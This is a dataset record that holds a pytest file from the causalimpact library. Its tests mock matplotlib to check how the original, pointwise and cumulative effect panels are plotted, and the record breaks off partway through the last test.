hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5b247673dd04b44a067be2d37427fec3c7c80590
| 35,100
|
py
|
Python
|
tests/test_plot.py
|
david-ml/causalimpact
|
64c0206fe3339fe24c6de95a41251438d9bfc672
|
[
"Apache-2.0"
] | 5
|
2020-11-12T01:19:12.000Z
|
2021-12-17T12:50:38.000Z
|
tests/test_plot.py
|
david-ml/causalimpact
|
64c0206fe3339fe24c6de95a41251438d9bfc672
|
[
"Apache-2.0"
] | null | null | null |
tests/test_plot.py
|
david-ml/causalimpact
|
64c0206fe3339fe24c6de95a41251438d9bfc672
|
[
"Apache-2.0"
] | 3
|
2018-11-28T14:17:57.000Z
|
2021-07-14T20:41:39.000Z
|
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Tests for module plot.py. Module matplotlib is not required as it's mocked accordingly.
"""
from __future__ import absolute_import, division, print_function
from datetime import datetime, timedelta
import mock
import pandas as pd
import pytest
from numpy.testing import assert_array_equal
from pandas import Timestamp
import causalimpact.plot as plot
from causalimpact import CausalImpact
def test_plot_original_panel(rand_data, pre_int_period, post_int_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
plot_mock = mock.Mock(return_value=plotter_mock)
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['original'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1)
ax_args = ax_mock.plot.call_args_list
llb = ci.trained_model.filter_results.loglikelihood_burn
assert_array_equal(pd.concat([ci.pre_data.iloc[llb:, 0], ci.post_data.iloc[:, 0]]),
ax_args[0][0][0])
assert ax_args[0][0][1] == 'k'
assert ax_args[0][1] == {'label': 'y'}
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['preds'], ax_args[1][0][0])
assert ax_args[1][0][1] == 'b--'
assert ax_args[1][1] == {'label': 'Predicted'}
ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['preds'].index)
assert_array_equal(ax_args[0][1], inferences['preds_lower'])
assert_array_equal(ax_args[0][2], inferences['preds_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_original_panel_gap_data(rand_data, pre_int_gap_period,
post_int_gap_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_gap_period, post_int_gap_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
plot_mock = mock.Mock(return_value=plotter_mock)
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['original'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1)
ax_args = ax_mock.plot.call_args_list
llb = ci.trained_model.filter_results.loglikelihood_burn
assert_array_equal(pd.concat([ci.pre_data.iloc[llb:, 0], ci.post_data.iloc[:, 0]]),
ax_args[0][0][0])
assert ax_args[0][0][1] == 'k'
assert ax_args[0][1] == {'label': 'y'}
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['preds'], ax_args[1][0][0])
assert ax_args[1][0][1] == 'b--'
assert ax_args[1][1] == {'label': 'Predicted'}
ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['preds'].index)
assert_array_equal(ax_args[0][1], inferences['preds_lower'])
assert_array_equal(ax_args[0][2], inferences['preds_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_original_panel_date_index(date_rand_data, pre_str_period, post_str_period,
monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['original'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1)
ax_args = ax_mock.plot.call_args_list
llb = ci.trained_model.filter_results.loglikelihood_burn
assert_array_equal(ci.data.iloc[llb:, 0], ax_args[0][0][0])
assert ax_args[0][0][1] == 'k'
assert ax_args[0][1] == {'label': 'y'}
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['preds'], ax_args[1][0][0])
assert ax_args[1][0][1] == 'b--'
assert ax_args[1][1] == {'label': 'Predicted'}
date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
date_ = date_ + timedelta(days=-1)
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['preds'].index)
assert_array_equal(ax_args[0][1], inferences['preds_lower'])
assert_array_equal(ax_args[0][2], inferences['preds_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_original_panel_gap_date_index(date_rand_data, pre_str_gap_period,
post_str_gap_period, monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_gap_period, post_str_gap_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['original'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1)
ax_args = ax_mock.plot.call_args_list
llb = ci.trained_model.filter_results.loglikelihood_burn
assert_array_equal(pd.concat([ci.pre_data.iloc[llb:, 0], ci.post_data.iloc[:, 0]]),
ax_args[0][0][0])
assert ax_args[0][0][1] == 'k'
assert ax_args[0][1] == {'label': 'y'}
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['preds'], ax_args[1][0][0])
assert ax_args[1][0][1] == 'b--'
assert ax_args[1][1] == {'label': 'Predicted'}
date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['preds'].index)
assert_array_equal(ax_args[0][1], inferences['preds_lower'])
assert_array_equal(ax_args[0][2], inferences['preds_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_original_panel_date_index_no_freq(date_rand_data, pre_str_period,
post_str_period, monkeypatch):
dd = date_rand_data.copy()
dd.drop(dd.index[10:20])
ci = CausalImpact(dd, pre_str_period, post_str_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['original'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1)
ax_args = ax_mock.plot.call_args_list
llb = ci.trained_model.filter_results.loglikelihood_burn
assert_array_equal(ci.data.iloc[llb:, 0], ax_args[0][0][0])
assert ax_args[0][0][1] == 'k'
assert ax_args[0][1] == {'label': 'y'}
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['preds'], ax_args[1][0][0])
assert ax_args[1][0][1] == 'b--'
assert ax_args[1][1] == {'label': 'Predicted'}
date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
date_ = date_ + timedelta(days=-1)
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['preds'].index)
assert_array_equal(ax_args[0][1], inferences['preds_lower'])
assert_array_equal(ax_args[0][2], inferences['preds_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_pointwise_panel(rand_data, pre_int_period, post_int_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['pointwise'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['point_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Point Effects'}
ax_mock.axvline.assert_called_with(ci.post_period[0] - 1, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_pointwise_panel_gap_data(rand_data, pre_int_gap_period,
post_int_gap_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_gap_period, post_int_gap_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['pointwise'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['point_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Point Effects'}
ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_pointwise_panel_date_index(date_rand_data, pre_str_period, post_str_period,
monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['pointwise'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['point_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Point Effects'}
date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
date_ = date_ + timedelta(days=-1)
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_pointwise_panel_gap_date_index(date_rand_data, pre_str_gap_period,
post_str_gap_period, monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_gap_period, post_str_gap_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['pointwise'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['point_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Point Effects'}
date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_pointwise_panel_date_index_no_freq(date_rand_data, pre_str_period,
post_str_period, monkeypatch):
dd = date_rand_data.copy()
dd.drop(dd.index[10:20])
ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['pointwise'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['point_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Point Effects'}
date_ = datetime.strptime(ci.post_period[0], "%Y%m%d")
date_ = date_ + timedelta(days=-1)
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['point_effects'].index)
assert_array_equal(ax_args[0][1], inferences['point_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['point_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_cumulative_panel(rand_data, pre_int_period, post_int_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_period, post_int_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['cumulative'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Cumulative Effect'}
ax_mock.axvline.assert_called_with(ci.post_period[0] - 1, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_cumulative_panel_gap_data(rand_data, pre_int_gap_period,
post_int_gap_period, monkeypatch):
ci = CausalImpact(rand_data, pre_int_gap_period, post_int_gap_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['cumulative'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Cumulative Effect'}
ax_mock.axvline.assert_called_with(ci.pre_period[1], c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_cumulative_panel_date_index(date_rand_data, pre_str_period, post_str_period,
monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_period, post_str_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['cumulative'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
plotter_mock.subplot.assert_any_call(1, 1, 1, sharex=ax_mock)
ax_args = ax_mock.plot.call_args
llb = ci.trained_model.filter_results.loglikelihood_burn
inferences = ci.inferences.iloc[llb:, :]
assert_array_equal(inferences['post_cum_effects'], ax_args[0][0])
assert ax_args[0][1] == 'b--'
assert ax_args[1] == {'label': 'Cumulative Effect'}
date_ = datetime.strptime(ci.pre_period[1], "%Y%m%d")
date_ = Timestamp(date_.strftime("%Y-%m-%d %H:%M:%S"))
ax_mock.axvline.assert_called_with(date_, c='k', linestyle='--')
ax_args = ax_mock.fill_between.call_args_list[0]
assert_array_equal(ax_args[0][0], inferences['post_cum_effects'].index)
assert_array_equal(ax_args[0][1], inferences['post_cum_effects_lower'])
assert_array_equal(ax_args[0][2], inferences['post_cum_effects_upper'])
assert ax_args[1] == {'facecolor': 'blue', 'interpolate': True, 'alpha': 0.25}
ax_mock.axhline.assert_called_with(y=0, color='k', linestyle='--')
ax_mock.grid.assert_called_with(True, linestyle='--')
ax_mock.legend.assert_called()
plotter_mock.show.assert_called_once()
fig_mock.text.assert_called_once_with(
0.1,
0.01,
('Note: The first 1 observations were removed due to approximate diffuse '
'initialization.'),
fontsize='large'
)
def test_plot_cumulative_panel_gap_date_index(date_rand_data, pre_str_gap_period,
post_str_gap_period, monkeypatch):
ci = CausalImpact(date_rand_data, pre_str_gap_period, post_str_gap_period)
ax_mock = mock.Mock()
plotter_mock = mock.Mock()
plotter_mock.subplot.return_value = ax_mock
plot_mock = mock.Mock(return_value=plotter_mock)
fig_mock = mock.Mock()
plotter_mock.figure.return_value = fig_mock
monkeypatch.setattr(plot.Plot, '_get_plotter', plot_mock)
ci.plot(panels=['cumulative'])
plot_mock.assert_called_once()
plotter_mock.figure.assert_called_with(figsize=(15, 12))
